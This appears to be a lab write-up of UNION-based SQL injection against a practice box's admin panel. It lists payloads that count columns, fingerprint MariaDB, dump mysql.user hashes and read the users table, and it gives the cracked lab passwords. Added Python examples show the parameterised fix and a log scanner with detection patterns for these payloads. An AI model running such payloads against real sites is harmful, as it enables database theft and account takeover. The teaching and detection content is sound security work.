SQLi


SQLi is confirmed to be present in one of the sections of the admin panel.

I will get straight to enumeration.

Detecting the number of columns in the query


' UNION SELECT 1,1,1#

There are a total of 3 columns within this query. The 3rd column isn't displayed, so I can only display 2 pieces of information at a time.
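To show why the column-count probe above errors until the injected SELECT has exactly as many columns as the original query, and what the same lookup looks like once it is parameterised, here is an added Python example (my code, not the writeup's or the box's) using an in-memory SQLite table that stands in for the application's users table. SQLite does not accept MariaDB's `#` comment, so the payloads use `-- ` instead; the table rows and the `search_*` function names are constructed for this example.

```python
import sqlite3

# Constructed stand-in for the application's users table; the values are
# placeholders made up for this example, not data from the target.
SAMPLE_USERS = [
    (1, "admin", "<hash-placeholder-1>"),
    (2, "gio", "<hash-placeholder-2>"),
]


def make_db():
    """Create an in-memory SQLite database with a three-column users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def search_vulnerable(conn, term):
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = f"SELECT id, username, password FROM users WHERE username = '{term}'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE username = ?"
    return conn.execute(sql, (term,)).fetchall()


def probe(conn, fn, term):
    """Run a lookup and return ('rows', rows) or ('error', message)."""
    try:
        return ("rows", fn(conn, term))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    # Two columns on the right of UNION against three on the left: the engine
    # rejects the statement, which is the signal the column-count probe relies on.
    print(probe(db, search_vulnerable, "' UNION SELECT 1,1 -- "))
    # Three columns: the injected literals come back as a result row.
    print(probe(db, search_vulnerable, "' UNION SELECT 1,1,1 -- "))
    # Same payload against the parameterised lookup: treated as a username, no rows.
    print(probe(db, search_safe, "' UNION SELECT 1,1,1 -- "))
    print(probe(db, search_safe, "gio"))
```

Binding the value as a parameter is the fix; the column-count error and the extra row only appear when the input is spliced into the statement text. Note also that the enumeration that follows works because the application connects with a privileged account; a dedicated database user holding only the rights the page needs would not be able to read mysql.user.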

Version


' UNION SELECT database(),version(),1#

The current DB is bankrobber, and the DB server is MariaDB 10.1.38.

Current User


' UNION SELECT user(),system_user(),1#

The currently authenticated user is root@localhost. It has the highest privileges, since it is the root user.

DB Credential


' UNION SELECT user,password,1 FROM mysql.user#

The command lists all the users and their password hashes. I see the password hash for the root user: F435725A173757E57BD36B09048B8B610FF4D0C4

Password Cracking


Although Hashcat was unable to crack the password hash, CrackStation did. The password is Welkom1!

I can stop at this point, but I will continue for sport and practice.

Enumerating Databases


' UNION SELECT GROUP_CONCAT(schema_name), NULL, NULL FROM information_schema.schemata#

There are a total of 6 DBs within the MariaDB server; 3 of them aren't part of the default installation:

  • bankrobber
  • phpmyadmin
  • test

bankrobber


' UNION SELECT GROUP_CONCAT(table_name), NULL, NULL FROM information_schema.tables WHERE table_schema='bankrobber'#

There are 3 tables within the bankrobber DB:

  • balance
  • hold
  • users

I am not interested in balance or hold, as they would only contain data from the transfer feature. I will take a look at the bankrobber.users table.

' UNION SELECT GROUP_CONCAT(column_name), NULL, NULL FROM information_schema.columns WHERE table_name='users' AND table_schema='bankrobber'#

bankrobber.users contains 3 columns of data:

  • id
  • username
  • password

' UNION SELECT GROUP_CONCAT(username, ':', password), NULL, NULL FROM bankrobber.users#

Displaying the content of bankrobber.users.username and bankrobber.users.password:

  • admin:Hopelessromantic (already found)
  • gio:gio (new)
  • test:test123 (testing account)

A new credential is found: gio:gio

Although these are credentials for the web application, I can still try them for credential reuse. Moving on to the next DB.

phpmyadmin


' UNION SELECT GROUP_CONCAT(table_name), NULL, NULL FROM information_schema.tables WHERE table_schema='phpmyadmin'#

There are so many tables that the output broke the website layout, yet none of them seem to contain any credentials.

test


' UNION SELECT GROUP_CONCAT(table_name), NULL, NULL FROM information_schema.tables WHERE table_schema='test'#

The test DB is empty.
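Every step of the enumeration above leaves a recognisable trace in the web server's access log: a URL-encoded UNION SELECT, references to information_schema or mysql.user, and fingerprinting calls such as version() and database(). The following is an added Python example (my code, not part of the writeup) that URL-decodes the query string of each request and flags those patterns. The log lines are constructed in Apache combined style for this example, with made-up IPs, the hypothetical path /admin/search.php, and a parameter named term; only the payload text reproduces the queries shown on this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined style, invented for this example).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /admin/search.php?term=gio HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:07 +0000] "GET /admin/search.php?term=%27+UNION+SELECT+1%2C1%2C1%23 HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2020:10:00:12 +0000] "GET /admin/search.php?term=%27+UNION+SELECT+database%28%29%2Cversion%28%29%2C1%23 HTTP/1.1" 200 655
10.0.0.5 - - [01/Jan/2020:10:00:20 +0000] "GET /admin/search.php?term=%27+UNION+SELECT+user%2Cpassword%2C1+FROM+mysql.user%23 HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2020:10:01:00 +0000] "GET /admin/search.php?term=union+station HTTP/1.1" 200 300
10.0.0.5 - - [01/Jan/2020:10:01:30 +0000] "GET /admin/search.php?term=%27+UNION+SELECT+GROUP_CONCAT%28schema_name%29%2CNULL%2CNULL+FROM+information_schema.schemata%23 HTTP/1.1" 200 700
"""

# Minimal combined-log parser: client IP, timestamp, method, request path, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Detection rules, matched case-insensitively against the URL-decoded query string.
RULES = [
    ("union_select", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("mysql_user_table", re.compile(r"\bmysql\.user\b", re.I)),
    ("db_fingerprint", re.compile(r"\b(version|database|user|system_user)\s*\(\s*\)", re.I)),
]


def decode_query(path):
    """Return the URL-decoded query string of a request path, or '' if it has none."""
    _, sep, query = path.partition("?")
    return unquote_plus(query) if sep else ""


def classify(line):
    """Parse one log line into (ip, decoded_query, matched_rule_names); None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_query(m.group("path"))
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return m.group("ip"), decoded, hits


def scan(log_text):
    """Group flagged requests by source IP: {ip: [(decoded_query, rule_names), ...]}."""
    flagged = {}
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[2]:
            ip, decoded, hits = parsed
            flagged.setdefault(ip, []).append((decoded, hits))
    return flagged


if __name__ == "__main__":
    for ip, requests in scan(SAMPLE_LOG).items():
        print(f"{ip}: {len(requests)} suspicious request(s)")
        for decoded, hits in requests:
            print(f"  {', '.join(hits):<35} {decoded}")
```

Decoding before matching matters: the raw log only shows `%27+UNION+SELECT`, and a rule written against the encoded form misses the same payload sent with different encoding. The plain request for "union station" shows why the rule insists on UNION followed by SELECT rather than on the word alone. A single source producing several hits in quick succession, escalating from a column-count probe to information_schema and mysql.user, is the pattern worth alerting on rather than any one line.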